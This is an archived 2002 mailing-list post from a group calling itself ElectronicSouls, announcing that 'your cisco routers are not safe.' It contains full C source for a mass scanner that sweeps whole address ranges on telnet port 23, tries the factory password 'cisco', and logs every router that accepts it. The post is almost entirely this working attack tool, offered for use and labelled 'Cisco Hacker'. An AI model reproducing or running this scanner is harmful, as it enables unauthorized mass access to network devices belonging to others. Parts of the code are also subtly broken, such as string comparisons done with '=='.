| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200211290956.gAT9uqdv072689@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] Cisco scanner
-----BEGIN PGP SIGNED MESSAGE-----
Your cisco routers are not safe.
/* 4553-Cisco Scanner
Cisco Scanner will scan for Cisco Routers
that still got their default password set.
*/
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#define ES struct sockaddr
#define SIZE sizeof(struct sockaddr_in)
#define ADDR 16
int ConnectCheck(struct sockaddr_in, int);
const char *ipv4_ntop(int, const void *, char *, size_t);
FILE *stream;
int main(int argc, char *argv[])
{
int i=0,
o=0,
p=0,
status,
childs=120,
timeout=5,
class=0;
char IP[15],*NET,c;
struct sockaddr_in DestAddress;
if(argc < 3)
{
printf(" 0x4553\n");
printf(" usage: %s <IP> <class> [option]\n",argv[0]);
printf(" class A : %s 234 A \n",argv[0]);
printf(" class B : %s 234.10 B \n",argv[0]);
printf(" class C : %s 234.10.23 C \n",argv[0]);
printf(" -c childs \n");
printf(" -t timeout \n");
printf(" Output: enable.cisco \n\n");
exit(1);
}
NET = argv[1];
class = argv[2];
opterr = 0;
while((c = getopt(argc, argv, "c:t:")) != -1)
{
switch(c)
{
case 'c':
childs = atoi(optarg);
break;
case 't': timeout = atoi(optarg);
break;
}
}
if(childs < 1)
{
printf("invalid number of childs\n");
exit(1);
}
if(timeout < 1)
{
printf("invalid timeout\n");
exit(1);
}
printf("\n\n-= 0x4553 Cisco Hacker =-\n");
printf("-= scan's for cisco's with factory password set. =-\n");
printf("-= (C) ElectronicSouls. =-\n\n");
if (class=="A")
fprintf(stderr, "Scanning: %s.*.*.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n",NET,childs,timeout);
if (class=="B")
fprintf(stderr,"Scanning: %s.*.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n", NET,childs,timeout);
if (class=="C")
fprintf(stderr,"Scanning: %s.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n",NET,childs,timeout);
DestAddress.sin_family = AF_INET;
DestAddress.sin_port = htons(23);
if (class=="A")
{
for(p = 0;
p < 256;
p++)
{
for(o = 0;
o < 256;
o++)
{
for(i = 0;
i < 256;
i++)
{
if (i > childs || o > 0 || p > 0 )
{
wait(&status);
}
sprintf(IP, "%s.%d.%d.%d", NET,p,o,i);
inet_aton(IP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, timeout);
}
}
}
}
if (class=="B")
{
for(o = 0;
o < 256;
o++)
{
for(i = 0;
i < 256;
i++)
{
if (i > childs || o > 0)
{
wait(&status);
}
sprintf(IP, "%s.%d.%d", NET,o,i);
inet_aton(IP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, timeout);
}
}
}
if (class=="C")
{
for(i = 0;
i < 256;
i++)
{
if (i > childs)
{
wait(&status);
}
sprintf(IP, "%s.%d", NET, i);
inet_aton(IP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, timeout);
}
}
for(;;)
{
if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD))
exit(0);
}
}
int ConnectCheck(struct sockaddr_in DestAddr, int timeout)
{
int result,ret,sock;
char Hostname[60],buffer1[64],buffer2[64];
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit (EXIT_FAILURE);
alarm(timeout);
result = connect(sock, (ES *)&DestAddr, SIZE);
if (!result)
{
alarm(timeout);
memset(buffer1, '\0', 64);
memset(buffer2, '\0', 64);
if ((ret = read(sock, buffer1, 64)) > 0)
{
ret = read(sock, buffer1, 64);
send(sock,"cisco\r",6,0);
ret = read(sock, buffer2, 64);
if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
{
stream = fopen("enable.cisco","a");
printf("[!] -- Cisco found: %s --\n",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
fprintf(stream,"%s\n", ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
fclose(stream);
}
}
close(sock);
}
exit(0);
}
const char *
ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len)
{
const u_char *es = (const u_char *)addrptr;
if(family == AF_INET)
{
char temp[ADDR];
snprintf(temp, sizeof(temp), "%d.%d.%d.%d", es[0], es[1], es[2], es[3]);
strcpy(strptr, temp);
return(strptr);
}
printf("Address family not supported by protocol.\n");
return(0);
}
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Talking to me, punk?"
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nPCAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltyg0AoKlg+3BuyQWs
U4rEK1oCrfYhpgViAJ9qF1K1T0BeWK9KDFoxauS5CCdZmg==
=GNfO
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists